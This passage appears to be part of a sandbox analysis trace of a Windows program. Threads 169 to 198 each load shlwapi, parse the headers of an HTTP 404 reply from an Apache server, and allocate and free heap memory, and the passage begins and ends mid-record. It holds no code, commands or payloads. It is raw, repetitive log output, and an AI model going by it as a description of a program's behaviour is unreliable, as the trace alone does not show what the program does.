GetProcessHeap () returned 0x6a0000 [0194.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be910 [0194.954] GetProcessHeap () returned 0x6a0000 [0194.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be910 | out: hHeap=0x6a0000) returned 1 [0194.954] GetProcessHeap () returned 0x6a0000 [0194.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 169 os_tid = 0xe44 [0195.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.270] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0195.270] GetProcessHeap () returned 0x6a0000 [0195.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7f0 [0195.270] GetProcessHeap () returned 0x6a0000 [0195.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7f0 | out: hHeap=0x6a0000) returned 1 [0195.270] GetProcessHeap () returned 0x6a0000 [0195.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 170 os_tid = 0x5ec [0195.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.476] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0195.476] GetProcessHeap () returned 0x6a0000 [0195.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0195.476] GetProcessHeap () returned 0x6a0000 [0195.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0195.476] GetProcessHeap () returned 0x6a0000 [0195.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 171 os_tid = 0x944 [0195.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.697] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0195.701] GetProcessHeap () returned 0x6a0000 [0195.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0195.701] GetProcessHeap () returned 0x6a0000 [0195.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0195.701] GetProcessHeap () returned 0x6a0000 [0195.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 172 os_tid = 0xd9c [0195.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.918] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0195.918] GetProcessHeap () returned 0x6a0000 [0195.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0195.919] GetProcessHeap () returned 0x6a0000 [0195.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0195.919] GetProcessHeap () returned 0x6a0000 [0195.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 173 os_tid = 0x5e8 [0196.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.198] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0196.199] GetProcessHeap () returned 0x6a0000 [0196.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0196.199] GetProcessHeap () returned 0x6a0000 [0196.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0196.199] GetProcessHeap () returned 0x6a0000 [0196.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 174 os_tid = 0xfe4 [0196.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.366] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0196.366] GetProcessHeap () returned 0x6a0000 [0196.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0196.366] GetProcessHeap () returned 0x6a0000 [0196.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0196.366] GetProcessHeap () returned 0x6a0000 [0196.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 175 os_tid = 0xe38 [0196.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.793] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0196.793] GetProcessHeap () returned 0x6a0000 [0196.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0196.793] GetProcessHeap () returned 0x6a0000 [0196.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0196.793] GetProcessHeap () returned 0x6a0000 [0196.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 176 os_tid = 0xd90 [0197.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.073] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.073] GetProcessHeap () returned 0x6a0000 [0197.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0197.073] GetProcessHeap () returned 0x6a0000 [0197.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0197.073] GetProcessHeap () returned 0x6a0000 [0197.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 177 os_tid = 0x8f0 [0197.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.269] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.269] GetProcessHeap () returned 0x6a0000 [0197.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0197.269] GetProcessHeap () returned 0x6a0000 [0197.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0197.269] GetProcessHeap () returned 0x6a0000 [0197.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 178 os_tid = 0x89c [0197.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.444] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.444] GetProcessHeap () returned 0x6a0000 [0197.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0197.444] GetProcessHeap () returned 0x6a0000 [0197.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0197.444] GetProcessHeap () returned 0x6a0000 [0197.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 179 os_tid = 0x404 [0197.596] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.625] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.625] GetProcessHeap () returned 0x6a0000 [0197.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0197.625] GetProcessHeap () returned 0x6a0000 [0197.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0197.625] GetProcessHeap () returned 0x6a0000 [0197.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 180 os_tid = 0xe48 [0197.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.807] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0197.807] GetProcessHeap () returned 0x6a0000 [0197.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0197.807] GetProcessHeap () returned 0x6a0000 [0197.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0197.807] GetProcessHeap () returned 0x6a0000 [0197.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 181 os_tid = 0x8ac [0198.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.067] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0198.067] GetProcessHeap () returned 0x6a0000 [0198.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0198.068] GetProcessHeap () returned 0x6a0000 [0198.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0198.068] GetProcessHeap () returned 0x6a0000 [0198.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 182 os_tid = 0xc04 [0198.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.293] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0198.293] GetProcessHeap () returned 0x6a0000 [0198.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be838 [0198.293] GetProcessHeap () returned 0x6a0000 [0198.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be838 | out: hHeap=0x6a0000) returned 1 [0198.294] GetProcessHeap () returned 0x6a0000 [0198.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 183 os_tid = 0x13bc [0198.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.488] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0198.488] GetProcessHeap () returned 0x6a0000 [0198.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0198.490] GetProcessHeap () returned 0x6a0000 [0198.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0198.490] GetProcessHeap () returned 0x6a0000 [0198.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 184 os_tid = 0xafc [0198.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.676] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0198.676] GetProcessHeap () returned 0x6a0000 [0198.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0198.677] GetProcessHeap () returned 0x6a0000 [0198.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0198.677] GetProcessHeap () returned 0x6a0000 [0198.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 185 os_tid = 0x13dc [0198.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.887] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0198.887] GetProcessHeap () returned 0x6a0000 [0198.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be838 [0198.887] GetProcessHeap () returned 0x6a0000 [0198.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be838 | out: hHeap=0x6a0000) returned 1 [0198.887] GetProcessHeap () returned 0x6a0000 [0198.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 186 os_tid = 0x5a0 [0199.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.149] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0199.149] GetProcessHeap () returned 0x6a0000 [0199.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0199.149] GetProcessHeap () returned 0x6a0000 [0199.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0199.149] GetProcessHeap () returned 0x6a0000 [0199.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 187 os_tid = 0x920 [0199.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.337] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0199.337] GetProcessHeap () returned 0x6a0000 [0199.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0199.338] GetProcessHeap () returned 0x6a0000 [0199.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0199.338] GetProcessHeap () returned 0x6a0000 [0199.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 188 os_tid = 0xfa0 [0199.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.581] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0199.581] GetProcessHeap () returned 0x6a0000 [0199.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0199.581] GetProcessHeap () returned 0x6a0000 [0199.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0199.581] GetProcessHeap () returned 0x6a0000 [0199.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 189 os_tid = 0x184 [0199.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.776] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0199.776] GetProcessHeap () returned 0x6a0000 [0199.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0199.776] GetProcessHeap () returned 0x6a0000 [0199.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0199.776] GetProcessHeap () returned 0x6a0000 [0199.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 190 os_tid = 0x51c [0199.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.991] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0199.991] GetProcessHeap () returned 0x6a0000 [0199.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0199.991] GetProcessHeap () returned 0x6a0000 [0199.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0199.991] GetProcessHeap () returned 0x6a0000 [0199.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 191 os_tid = 0xdb0 [0200.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.235] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0200.235] GetProcessHeap () returned 0x6a0000 [0200.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0200.235] GetProcessHeap () returned 0x6a0000 [0200.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0200.236] GetProcessHeap () returned 0x6a0000 [0200.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 192 os_tid = 0x9e0 [0200.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.448] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0200.448] GetProcessHeap () returned 0x6a0000 [0200.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0200.448] GetProcessHeap () returned 0x6a0000 [0200.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0200.448] GetProcessHeap () returned 0x6a0000 [0200.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 193 os_tid = 0xd94 [0200.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0200.653] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0200.653] GetProcessHeap () returned 0x6a0000 [0200.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0200.653] GetProcessHeap () returned 0x6a0000 [0200.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0200.653] GetProcessHeap () returned 0x6a0000 [0200.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 194 os_tid = 0x928 [0201.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.155] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0201.155] GetProcessHeap () returned 0x6a0000 [0201.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea00 [0201.155] GetProcessHeap () returned 0x6a0000 [0201.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea00 | out: hHeap=0x6a0000) returned 1 [0201.155] GetProcessHeap () returned 0x6a0000 [0201.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 195 os_tid = 0x934 [0201.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.374] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0201.375] GetProcessHeap () returned 0x6a0000 [0201.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0201.375] GetProcessHeap () returned 0x6a0000 [0201.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0201.375] GetProcessHeap () returned 0x6a0000 [0201.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 196 os_tid = 0x510 [0201.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.594] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0201.594] GetProcessHeap () returned 0x6a0000 [0201.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0201.594] GetProcessHeap () returned 0x6a0000 [0201.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0201.594] GetProcessHeap () returned 0x6a0000 [0201.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 197 os_tid = 0xf28 [0201.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.791] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0201.791] GetProcessHeap () returned 0x6a0000 [0201.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea78 [0201.791] GetProcessHeap () returned 0x6a0000 [0201.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea78 | out: hHeap=0x6a0000) returned 1 [0201.791] GetProcessHeap () returned 0x6a0000 [0201.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 198 os_tid = 0x690 [0201.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0201.999] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0201.999] GetProcessHeap () returned 0x6a0000 [0201.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0201.999] GetProcessHeap () returned 0x6a0000 [0201.999] HeapFree (in: 